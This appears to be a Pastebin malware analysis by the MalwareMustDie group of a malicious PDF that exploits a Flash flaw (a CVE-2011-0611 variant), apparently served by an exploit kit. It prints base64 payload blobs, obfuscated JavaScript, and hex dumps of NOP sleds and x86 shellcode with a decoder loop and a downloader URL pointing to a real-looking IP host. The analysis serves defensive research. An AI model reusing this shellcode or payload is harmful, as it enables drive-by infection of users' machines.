zU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  283.    :
  284. AcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol
  285.  
  286. // ANALYSIS...
  287.  
  288. // Is no room for the bins, and these are buffer overflow chars I use a lot in DefCon;
  289.  AAAA....AAAAA is a flooding of 0x41
  290.    :
  291. So the obfuscation of urls is in the rest part to be digged,  which must be containing downloader.. I currently XOR ing this
  292.  
  293. I am sure that before ver 8 is not affected to this exploit. It aimed PDF widget flash engine flaw. Mostly used above or ver 8.x I guess.
  294.  
  295. The concept is like these references:
  296. http://bugix-security.blogspot.jp/ or
  297. http://contagiodump.blogspot.jp/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
  298. ↑So as engineer can we say it 0day of the old concept?
  299. ===================
  300. So what's this?
  301. ==================
  302. Is a New Exploit Kit used PDF exploit with NEW PoC of exploitation of an old concept flaw in
  303. flash embedded player at PDF Widget is more like it,
  304. or if I may say , a variant of CVE-2011-061.                                  
  305.                 ^^^^^^^^^^^^^^^^^^^^^^^^^^
  306.  
  307. // [IMPORTANT] Another interesting obfuscation concept:
  308. //-------------------------------------------------------
  309. //did mention the usage of pseudo variable based on the date(time);
  310. //see the below:
  311.  
  312. fejrocemr=this.w[eoewdzos.info.Date+"&#0108;"];
  313. fejrocemr('function laumlpiah(){ret'+'urn("x2tdh45jRe0Ax2tdh45jRe65x2tdh45jRe64x2tdh45jRe6Cx2tdh45jRe65x2tdh45jRe6Ax2tdh45jRe65x2tdh45jRe6Dx2tdh45jRe6Fx2tdh45jRe
  314. //this makes the first obfuscation will burp the result in different variable values,
  315. // guess is a new way to avoid detection.
  316.  
  317. // WHAT EXPLOIT KIT USED?
  318.  
  319. By the discussion between @Donovan and @it4sec, it looks like KaiXin EK (or Impact EK) is in behind all this..
  320. record: https://twitter.com/MalwareMustDie/status/294456735953985536
  321.  
  322. // Where is THE URL???
  323.  
  324. // see the code above in this variable:
  325.  
  326.  hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
  327.  
  328. // you'll notice the base64 code trails is in there
  329. //  ( = the moronnz was making terrible miss.. idiotic coder.. good!)
  330.  
  331.  
  332. // decoded all of the strings into base64 you'll get below shellcode pattern, exploit pattern and URL in there...
  333.  
  334. 49 49 2a 00 38 20 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  335. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  336. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  337. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  338. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  339. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  340.      (too long snip.....)
  341. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  342. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  343. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  344. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  345. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb 17 b9 1c 03 00 00 8b 34
  346. 24 89 f7 56 80 3e 5e 74 06 ac 34 bc aa e2 fa c3 e8 e4 ff ff ff e2 31 ca a8 54 e6 bd bc bc 05 c8 bf
  347. bc bc 35 7b 4f 18 43 5c 31 0c b4 bf bc bc 54 f8 bd bc bc 2b 31 23 bc b9 bc bc d6 b6 e1 f1 b3 38 2c
  348. bc bc bc ea eb 54 d7 bd bc bc d4 3c be bc bc ef eb 54 84 bd bc bc 39 7c c8 be 57 5c d4 dd 3d 65 73
  349. 54 0e be bc bc 43 6c 80 ba c0 a4 54 cf bd bc bc 81 bc 9c bc bc c1 b0 ef 54 11 bc bc bc 39 7c c9 a2
  350. 57 04 ef 54 d8 bc bc bc 39 7c c9 ae 8d 7c d8 37 fc a4 37 fc 88 81 58 be bc bc c8 66 57 20 eb 35 4b
  351. d6 43 e5 8d 7c 40 4e 12 2b e3 3c 84 bc c8 bf 2a 57 38 eb 8d 7c d6 43 e5 40 4e da 13 7b fb 42 87 bc
  352. 8d bc e3 d4 3c be bc bc ef eb 54 07 bc bc bc d4 4e 67 c8 11 54 3b bd bc bc d4 24 d3 f3 81 ec 54 0a
  353. bd bc bc d6 bc d6 42 43 6c e9 35 59 d6 e8 e5 95 70 dc 31 c0 98 9c eb 8d 7c 4f 16 e3 31 cb ac d6 f8
  354. 33 ba 8d 67 d4 34 42 0f aa 54 b8 be bc bc eb ea ef ef ef ef ef ef ef 43 c9 b4 43 6c 35 f8 98 a0 dd
  355. 75 7e b8 bc e9 35 59 d6 80 e5 95 70 eb 31 c0 98 b8 ed eb 8d 7c 4f 16 e3 33 bb d6 cf d4 d2 bc dd bc
  356. d4 ce bc c9 bc 35 db b0 43 c9 b4 33 fb ac d4 46 c6 29 58 54 b8 bd bc bc d4 61 64 92 40 ec 54 8f bd
  357. bc bc eb 43 6c 3f 78 b0 e3 75 7e b8 bc d4 e8 76 13 2d 54 24 bd bc bc d6 fc d4 bc ac bc bc d6 bd d6
  358. bc 43 6c 7f e9 35 59 54 e4 bd bc bc d4 d9 53 f3 b9 ec 54 41 bc bc bc 8d 75 ed ed 43 c9 ac 43 c9 b0
  359. 43 c9 b4 ed 43 6c 75 7e b0 bc e9 35 59 d4 4e 67 c8 11 54 1e bc bc bc d4 c2 f6 3f 6b ec 54 6d bc bc
  360. bc d6 bc d4 99 bc ef bc 31 b0 98 43 c9 b0 ed 43 c9 b4 43 6c 75 7e b4 bc e9 35 59 3d 50 b4 be bc bc
  361. dc 8d 67 d4 cb 57 b7 9d 54 d6 bc bc bc 2a d4 b3 1b a2 e5 ea 54 24 bc bc bc 31 f1 40 ed d6 b4 d6 43
  362. 43 6c 2d 5f f6 d4 e6 d2 67 67 ea 54 3c bc bc bc 31 f1 44 31 01 44 41 43 43 ed d4 bc be bc bc eb d6
  363. a5 43 c9 40 43 6c 2d 5f 99 d4 71 30 cb 4d ea 54 e7 bc bc bc 43 8b 43 6c b3 0a b4 f5 d4 8e c2 ba 9c
  364. ea 54 f4 bc bc bc ed 43 8b 43 6c 37 a4 35 e0 98 a0 dd 75 7f dc 8d 7c d8 37 ec 8c 37 ee b0 37 ee a8
  365. 37 ce 94 8d 43 8d 7c 10 fa 39 7c c8 b1 80 dd c0 be 90 9c 7d 73 b1 bd 7b 57 57 87 c0 98 98 37 fe ac
  366. 37 ae c9 67 35 f8 98 a0 dd 7e b8 bc dc 37 d0 98 98 37 f9 80 37 e8 b9 c4 bd 56 37 f6 a4 37 e6 9c bd
  367. 57 5f 88 f5 37 88 37 bd 52 8d 43 8d 7c 40 10 38 7c c8 bb 7d 73 b1 bd 7b 57 48 87 c0 98 94 c9 5d 37
  368. e6 98 bd 57 da 37 b0 f7 37 e6 a0 bd 57 37 b8 37 bd 54 35 f8 98 a0 dd 7e b4 bc d4 d3 d2 bc bc d4 c9
  369. ce d0 d1 e8 54 bf bc bc bc e5 e5 7f d4 32 f2 b2 50 d4 ab 76 97 d2 54 e8 43 43 43 ec 54 34 43 43 43
  370. 43 5c d4 ab 76 97 d2 54 fe 43 43 43 43 c8 98 b8 ec 54 ce 43 43 43 7e b8 bc 68 74 74 70 3a 2f 2f 37
  371. 38 2e 31 31 30 2e 36 30 2e 39 39 2f 2f 6f 6c 65 67 64 65 6d 79 2e 70 68 70 3f 00 00 00 00 00 00 00
  372. 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  373.     (too long... snip)
  374. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 07 00
  375. 00 01 03 00 01 00 00 00 30 20 00 00 01 01 03 00 01 00 00 00 01 00 00 00 03 01 03 00 01 00 00 00 01
  376. 00 00 00 06 01 03 00 01 00 00 00 01 00 00 00 11 01 04 00 01 00 00 00 08 00 00 00 17 01 04 00 01 00
  377. 00 00 30 20 00 00 50 01 03 00 cc 00 00 00 92 20 00 00 00 00 00 00 00 0c 0c 08 ff ff ff ff 90 1f 80
  378. 4a 38 90 84 4a 7d 7e 80 4a ff ff ff ff 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00
  379. a5 63 80 4a 20 09 8a 4a 96 21 80 4a 90 1f 80 4a 30 90 84 4a d8 a7 80 4a 8d ab 80 4a 26 00 00 00 00
  380. 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41 a5 63 80 4a 6a 69 59 8d 33 b5 80 4a a5 63
  381. 80 4a 74 24 04 8d 4f 4b 82 4a a5 63 80 4a 78 0c f3 a4 22 0e 82 4a a2 63 80 4a 41 41 41 41 31 c9 64
  382. 8b 71 30 8b 76 0c 8b 76 1c 8b 6e 08 8b 46 20 8b 36 66 39 48 18 75 f2 8b 45 3c 8b 54 05 78 01 ea 8b
  383. 72 20 01 ee 31 c9 41 ad 01 e8 8b 18 2b 58 04 81 fb e5 20 dd ff 75 ef 49 8b 5a 24 01 eb 66 8b 0c 4b
  384. 8b 5a 1c 01 eb 03 2c 8b 89 e6 6a 04 ff 36 ff d5 85 c0 ad 75 f5 81 38 49 49 2a 00 75 ed 96 31 c9 b5
  385. 03 f3 a5
  386.  
  387. // So di you see anything useful?
  388. // yes , this is part of the shellcode..
  389. 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41 a5 63 80 4a 6a 69 59 8d 33 b5 80 4a a5 63
  390. 80 4a 74 24 04 8d 4f 4b 82 4a a5 63 80 4a 78 0c f3 a4 22 0e 82 4a a2 63 80 4a 41 41 41 41 31 c9 64
  391. 8b 71 30 8b 76 0c 8b 76 1c 8b 6e 08 8b 46 20 8b 36 66 39 48 18 75 f2 8b 45 3c 8b 54 05 78 01 ea 8b
  392. 72 20 01 ee 31 c9 41 ad 01 e8 8b 18 2b 58 04 81 fb e5 20 dd ff 75 ef 49 8b 5a 24 01 eb 66 8b 0c 4b
  393. 8b 5a 1c 01 eb 03 2c 8b 89 e6 6a 04 ff 36 ff d5 85 c0 ad 75 f5 81 38 49 49 2a 00 75 ed 96 31 c9 b5
  394. 03 f3 a5
  395.  
  396. // this part contains url:
  397. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb 17 b9 1c 03 00 00 8b 34
  398. 24 89 f7 56 80 3e 5e 74 06 ac 34 bc aa e2 fa c3 e8 e4 ff ff ff e2 31 ca a8 54 e6 bd bc bc 05 c8 bf
  399. bc bc 35 7b 4f 18 43 5c 31 0c b4 bf bc bc 54 f8 bd bc bc 2b 31 23 bc b9 bc bc d6 b6 e1 f1 b3 38 2c
  400. bc bc bc ea eb 54 d7 bd bc bc d4 3c be bc bc ef eb 54 84 bd bc bc 39 7c c8 be 57 5c d4 dd 3d 65 73
  401. 54 0e be bc bc 43 6c 80 ba c0 a4 54 cf bd bc bc 81 bc 9c bc bc c1 b0 ef 54 11 bc bc bc 39 7c c9 a2
  402. 57 04 ef 54 d8 bc bc bc 39 7c c9 ae 8d 7c d8 37 fc a4 37 fc 88 81 58 be bc bc c8 66 57 20 eb 35 4b
  403. d6 43 e5 8d 7c 40 4e 12 2b e3 3c 84 bc c8 bf 2a 57 38 eb 8d 7c d6 43 e5 40 4e da 13 7b fb 42 87 bc
  404. 8d bc e3 d4 3c be bc bc ef eb 54 07 bc bc bc d4 4e 67 c8 11 54 3b bd bc bc d4 24 d3 f3 81 ec 54 0a
  405. bd bc bc d6 bc d6 42 43 6c e9 35 59 d6 e8 e5 95 70 dc 31 c0 98 9c eb 8d 7c 4f 16 e3 31 cb ac d6 f8
  406. 33 ba 8d 67 d4 34 42 0f aa 54 b8 be bc bc eb ea ef ef ef ef ef ef ef 43 c9 b4 43 6c 35 f8 98 a0 dd
  407. 75 7e b8 bc e9 35 59 d6 80 e5 95 70 eb 31 c0 98 b8 ed eb 8d 7c 4f 16 e3 33 bb d6 cf d4 d2 bc dd bc
  408. d4 ce bc c9 bc 35 db b0 43 c9 b4 33 fb ac d4 46 c6 29 58 54 b8 bd bc bc d4 61 64 92 40 ec 54 8f bd
  409. bc bc eb 43 6c 3f 78 b0 e3 75 7e b8 bc d4 e8 76 13 2d 54 24 bd bc bc d6 fc d4 bc ac bc bc d6 bd d6
  410. bc 43 6c 7f e9 35 59 54 e4 bd bc bc d4 d9 53 f3 b9 ec 54 41 bc bc bc 8d 75 ed ed 43 c9 ac 43 c9 b0
  411. 43 c9 b4 ed 43 6c 75 7e b0 bc e9 35 59 d4 4e 67 c8 11 54 1e bc bc bc d4 c2 f6 3f 6b ec 54 6d bc bc
  412. bc d6 bc d4 99 bc ef bc 31 b0 98 43 c9 b0 ed 43 c9 b4 43 6c 75 7e b4 bc e9 35 59 3d 50 b4 be bc bc
  413. dc 8d 67 d4 cb 57 b7 9d 54 d6 bc bc bc 2a d4 b3 1b a2 e5 ea 54 24 bc bc bc 31 f1 40 ed d6 b4 d6 43
  414. 43 6c 2d 5f f6 d4 e6 d2 67 67 ea 54 3c bc bc bc 31 f1 44 31 01 44 41 43 43 ed d4 bc be bc bc eb d6
  415. a5 43 c9 40 43 6c 2d 5f 99 d4 71 30 cb 4d ea 54 e7 bc bc bc 43 8b 43 6c b3 0a b4 f5 d4 8e c2 ba 9c
  416. ea 54 f4 bc bc bc ed 43 8b 43 6c 37 a4 35 e0 98 a0 dd 75 7f dc 8d 7c d8 37 ec 8c 37 ee b0 37 ee a8
  417. 37 ce 94 8d 43 8d 7c 10 fa 39 7c c8 b1 80 dd c0 be 90 9c 7d 73 b1 bd 7b 57 57 87 c0 98 98 37 fe ac
  418. 37 ae c9 67 35 f8 98 a0 dd 7e b8 bc dc 37 d0 98 98 37 f9 80 37 e8 b9 c4 bd 56 37 f6 a4 37 e6 9c bd
  419. 57 5f 88 f5 37 88 37 bd 52 8d 43 8d 7c 40 10 38 7c c8 bb 7d 73 b1 bd 7b 57 48 87 c0 98 94 c9 5d 37
  420. e6 98 bd 57 da 37 b0 f7 37 e6 a0 bd 57 37 b8 37 bd 54 35 f8 98 a0 dd 7e b4 bc d4 d3 d2 bc bc d4 c9
  421. ce d0 d1 e8 54 bf bc bc bc e5 e5 7f d4 32 f2 b2 50 d4 ab 76 97 d2 54 e8 43 43 43 ec 54 34 43 43 43
  422. 43 5c d4 ab 76 97 d2 54 fe 43 43 43 43 c8 98 b8 ec 54 ce 43 43 43 7e b8 bc 68 74 74 70 3a 2f 2f 37
  423.  
  424. // hexed it and see the text:
  425. ・ケ  ・$悔V€>^tャ4シェ糶テ鞴・ハィT・シ゚ȿシシ5{OC\1 エソシシTシシ+1#シケシシヨカ碵ウ8,シシ
  426. シ・Tラスシシヤ<セシシ・T┸シシ9|ネセW\ヤン=esTセシシCl€コタ、Tマ愍シp・켼9|ɢW・リ켼9|ɮ鋼リ77・≠Xセシシ
  427. ネfW ・KヨC蜊|@N+・ļȿ*W8・|ヨC蕁Nレ{淏缍シ耿<・T켼ヤNgネT;ݼシヤ$モ・
  428. ݼシּヨBCl・Yヨ韃頻ワ1タ؜・|O・ヒャヨ・コ紅ヤ4BェT込シ・・・・・ノエCl5ンu~クシ・Yヨ€蝠p・タ
  429. 从溿鋼O・サヨマヤメシンシヤホシノシ5ローCノエ3譿ヤFニ)XT轼シヤad叩・Ͻシシ・l?xー縉~クシヤ钁-T$�ヨ・ܬシシּֽ
  430. Cl・YT・シ゚ヤルS・Aܼシ講澵CノャCノーCノエ銈lu~ーシ・YヤNgネT켼ヤツ・k・mܼシּԙシ・1ー呂ノー銈ノエCl
  431. u~エシ・Y=P侼シ܍gヤヒWםTּシシ*Գ「裲T$켼1櫢エヨCCl-_贅gg鶺<シシシ11DACC橳・・Cノ@Cl-
  432. _雙q0ヒM鶺・シマC気lウ
  433. エ篠コ懋Tシシ銈気l7、5燔ンuワ鋼リ7777ホ剥C鋼・|ネア€ンタセ頗}sアス{WW・・7ャ7ョノg5
  434. ン~クシワ7ミ・77雹トスV77譛スW_員7・スR垢鋼@8|ネサ}sアス{WH・・ノ]7譏スWレ7ー・譬スW7ク7スT5ン~
  435. エシヤモメシシヤノホミム鏥裹ヤ2Pヤォv淋T錣CC・4CCCC\ヤォv淋TCCCCネ
  436. 从・ホCCC~クシhttp://78.110.60.99//olegdemy.php?
  437.  
  438. #w00t!!
  439.  
  440. ----
  441. #MalwareMustDie
  442. reported by : @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top